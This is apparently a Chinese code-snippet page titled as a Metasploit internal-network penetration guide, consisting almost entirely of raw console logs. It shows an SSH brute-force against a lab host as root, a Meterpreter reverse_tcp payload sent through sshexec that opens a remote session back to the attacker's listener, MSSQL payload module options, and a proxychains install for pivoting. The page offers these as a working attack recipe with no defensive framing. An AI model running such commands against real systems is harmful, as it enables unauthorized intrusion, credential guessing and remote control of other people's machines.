用户注册



邮箱:

密码:

用户登录


邮箱:

密码:
记住登录一个月忘记密码?

发表随想


还能输入:200字
云代码 - asp代码库

metasploit渗透测试 内网渗透

2014-12-19 作者: asp源码之家举报

[asp]代码库

msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS
set PASSWORD   set PASS_FILE  
msf auxiliary(ssh_login) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(ssh_login) > exploit 

[*] 192.168.1.104:22 SSH - Starting bruteforce
[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: ''
[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':''
[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'
[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root'
[*] 192.168.1.104:22 SSH - [3/3] - Trying: username: 'root' with password: 'toor'
[*] Command shell session 4 opened (192.168.1.105:54562 -> 192.168.1.104:22) at 2014-08-07 22:55:54 +0800
[+] 192.168.1.104:22 SSH - [3/3] - Success: 'root':'toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions 

Active sessions
===============

  Id  Type         Information                       Connection
  --  ----         -----------                       ----------
  4   shell linux  SSH root:toor (192.168.1.104:22)  192.168.1.105:54562 -> 192.168.1.104:22 (192.168.1.104)

msf auxiliary(ssh_login) >




msf> use exploit/multi/ssh/sshexec 
msf exploit(sshexec) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec) > set LHOST 192.168.1.105 
LHOST => 192.168.1.105
msf exploit(sshexec) > set LPORT 8080
LPORT => 8080
msf exploit(sshexec) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(sshexec) > set PASSWORD toor
PASSWORD => toor
msf exploit(sshexec) > exploit 

[*] Started reverse handler on 192.168.1.105:8080 
[*] 192.168.1.104:22 - Sending Bourne stager...
[*] Command Stager progress -  40.39% done (288/713 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 192.168.1.104
[*] Command Stager progress - 100.00% done (713/713 bytes)
[*] Meterpreter session 3 opened (192.168.1.105:8080 -> 192.168.1.104:40813) at 2014-08-07 22:53:12 +0800

meterpreter > 






msf exploit(psexec) > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show options 

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(mssql_payload) >


root@kali:~# git clone https://github.com/rofl0r/proxychains-ng.git
正克隆到 'proxychains-ng'...
remote: Counting objects: 842, done.
remote: Total 842 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (842/842), 465.92 KiB | 27 KiB/s, done.
Resolving deltas: 100% (554/554), done.
root@kali:~# cd proxychains-ng/
root@kali:~/proxychains-ng#  ./configure --prefix=/usr --sysconfdir=/etc
Done, now run make && make install
root@kali:~/proxychains-ng# make && make install


网友评论    (发表评论)

共1 条评论 1/1页

发表评论:

评论须知:

  • 1、评论每次加2分,每天上限为30;
  • 2、请文明用语,共同创建干净的技术交流环境;
  • 3、若被发现提交非法信息,评论将会被删除,并且给予扣分处理,严重者给予封号处理;
  • 4、请勿发布广告信息或其他无关评论,否则将会删除评论并扣分,严重者给予封号处理。


扫码下载

加载中,请稍后...

输入口令后可复制整站源码

加载中,请稍后...